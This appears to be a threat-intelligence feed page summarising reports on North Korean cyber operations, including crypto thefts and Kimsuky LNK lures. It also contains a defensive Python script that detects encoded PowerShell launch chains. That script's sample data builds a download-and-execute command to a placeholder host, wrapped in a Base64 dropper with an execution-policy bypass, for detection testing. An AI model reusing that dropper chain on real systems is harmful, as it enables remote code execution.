This includes using smartphones, laptops, and tablets from well-known international brands. These activities demonstrate North Koreans' growing operational security awareness and highlight the regime's ability to acquire foreign technology, potentially un…
2024
654 reports
Elliptic assesses that hackers affiliated with North Korea stole about $235 million in cryptoassets from Indian exchange WazirX. The stolen assets included more than 200 tokens, with large amounts of Shiba Inu, Ether, Matic, and Pepe. Elliptic observed th…
WazirX reported a cyber attack against one multisig wallet that caused losses exceeding $230 million. The wallet used Liminal’s custody and wallet infrastructure and required approvals from three WazirX signatories plus Liminal, with whitelisted destinati…
The source traces the $230 million-plus WazirX hack from the exploiter address through test transactions, Tornado Cash withdrawals, and related funding paths. It identifies 0x6eedf92fb92dd68a270c3205e96dccc527728066 as the starting theft address, notes Ju…
Daily NK assesses that the June 2024 DPRK-Russia strategic partnership treaty could create a legal and diplomatic framework for closer cyber cooperation between Pyongyang and Moscow. The article points to treaty language on information security, science a…
The Korean source attributes a malicious Windows shortcut disguised as an employment application document to Kimsuky. The LNK launches obfuscated PowerShell with execution-policy bypass, decodes embedded Base64 script content, searches for matching shortc…
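As an added example (not code from the Korean source or from any Kimsuky reporting), the following script triages process-creation telemetry for the launch chain described above: PowerShell started with an execution-policy bypass, a hidden window and an encoded command, with further Base64 layers embedded in the decoded script. The log layout (parent image, tab, command line), the stage-2 URL, and the explorer.exe parent heuristic are assumptions; the sample log lines are constructed here, not taken from the report.

```python
"""Triage PowerShell command lines for the LNK -> PowerShell -> Base64 pattern.

Constructed sample data. Assumed log format: "<parent image>\t<command line>",
as one would export from Sysmon event 1 or Windows 4688 with command-line auditing.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# powershell.exe accepts abbreviated switches, so the short forms must be matched too.
EXEC_POLICY_RE = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)\b", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
NOPROFILE_RE = re.compile(r"-nop(?:rofile)?\b", re.I)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
INLINE_B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.I)
STRONG = {"execution-policy bypass", "encoded command", "embedded base64"}


@dataclass
class Finding:
    parent: str
    cmdline: str
    indicators: list = field(default_factory=list)
    decoded: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # One strong indicator plus any other hit is enough to pull the event for review.
        return bool(STRONG & set(self.indicators)) and len(self.indicators) >= 2


def decode_utf16_b64(b64: str) -> Optional[str]:
    """-EncodedCommand carries Base64 of UTF-16LE text; anything else is not a valid payload."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_inline_b64(b64: str) -> Optional[str]:
    """FromBase64String payloads are paired with a UTF8 or Unicode GetString; try both."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return None
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if "\x00" not in text:  # ASCII stored as UTF-16LE also decodes as UTF-8, with NULs
            return text
    return None


def triage(parent: str, cmdline: str) -> Finding:
    f = Finding(parent=parent, cmdline=cmdline)
    if EXEC_POLICY_RE.search(cmdline):
        f.indicators.append("execution-policy bypass")
    if HIDDEN_RE.search(cmdline):
        f.indicators.append("hidden window")
    if NOPROFILE_RE.search(cmdline):
        f.indicators.append("no profile")
    m = ENCODED_RE.search(cmdline)
    if m:
        f.indicators.append("encoded command")
        text = decode_utf16_b64(m.group(1))
        if text:
            f.decoded.append(text)
    # Peel embedded Base64 layers from the command line and from every layer already decoded.
    queue = [cmdline] + list(f.decoded)
    while queue:
        layer = queue.pop()
        for im in INLINE_B64_RE.finditer(layer):
            inner = decode_inline_b64(im.group(1))
            if inner and inner not in f.decoded:
                if "embedded base64" not in f.indicators:
                    f.indicators.append("embedded base64")
                f.decoded.append(inner)
                queue.append(inner)
    # A user double-clicking an LNK yields explorer.exe as the parent (assumed heuristic).
    if parent.lower().endswith("explorer.exe") and f.indicators:
        f.indicators.append("launched from explorer.exe")
    return f


# Constructed sample: an inner stage-2 fetch, wrapped in a Base64 dropper, then -EncodedCommand.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/a')"
INNER_B64 = base64.b64encode(STAGE2.encode("utf-8")).decode()
DROPPER = f"$p=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{INNER_B64}'));IEX $p"
ENC = base64.b64encode(DROPPER.encode("utf-16-le")).decode()

SAMPLE_LOG = [  # constructed telemetry, not from the report
    "services.exe\tpowershell.exe -NoProfile -Command \"Get-Service -Name Spooler\"",
    f"explorer.exe\tpowershell.exe -nop -w hidden -ep bypass -enc {ENC}",
]


def run(lines=SAMPLE_LOG) -> list:
    out = []
    for line in lines:
        parent, _, cmd = line.partition("\t")
        out.append(triage(parent, cmd))
    return out


if __name__ == "__main__":
    for f in run():
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{flag:10} {f.parent}: {', '.join(f.indicators) or 'no indicators'}")
        for d in f.decoded:
            print("   decoded:", d[:90])
```

The benign line trips only the no-profile switch and is left alone; the LNK-style line is flagged and both decoded layers are surfaced, so the analyst sees the stage-2 fetch without running anything. Run it against an export of your own process-creation events by passing the lines to run().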
Rapid7 details Kimsuky phishing operations tied to North Korea’s Reconnaissance General Bureau, with targeting against government, research, academic, and think-tank organizations aligned with DPRK strategic interests. The group builds trust through multi…
Example: Light Fury (@Gary Lee) is a DPRK IT worker who transferred $300K+ from his public ENS address to Kim Sang Man, who is on the OFAC sanctions list. DPRK IT workers are typically easy to spot and are not the smartest individuals. 0x9b9 was funded by …
Validin used historic DNS, host-response data, and certificate pivots to expand from roomconnect[.]online into additional infrastructure assessed as Lazarus Group-related. The research focused on meeting-themed domains, wildcarded subdomains, shared IP re…
Objective-See analyzed a malicious macOS disk image, MiroTalk.dmg, distributed from a cloned Miro Talk site and tied in the source to North Korean activity and Palo Alto Networks Unit 42’s job-themed campaign reporting. The unsigned app contained a Qt/QMa…
Dark Atlas analyzed Kimsuky's TrollAgent stealer campaign against South Korean targets, with samples compiled in late 2023 and activity tracked from January 2024. The installer used digital signatures from SGA Solutions and D2innovation, dropped a Go-base…
More than $35 million from the $305 million DMM Bitcoin hack was reported laundered through the Huione Guarantee marketplace in July 2024. The excerpt says Lazarus Group is suspected because of laundering similarities and off-chain indicators, but it does…
Konni activity against South Korean targets used spear-phishing lures and LNK files to start a compiled AutoIt payload with low detection coverage, according to the archived source. The reporting highlights compromised-site payload hosting, Korean RTP eng…
CoinStats attributed its June 22, 2024 wallet breach to Lazarus Group or a related nation-state-level organization after reviewing evidence with law enforcement and security researchers. The attacker gained unauthorized access across CoinStats infrastruct…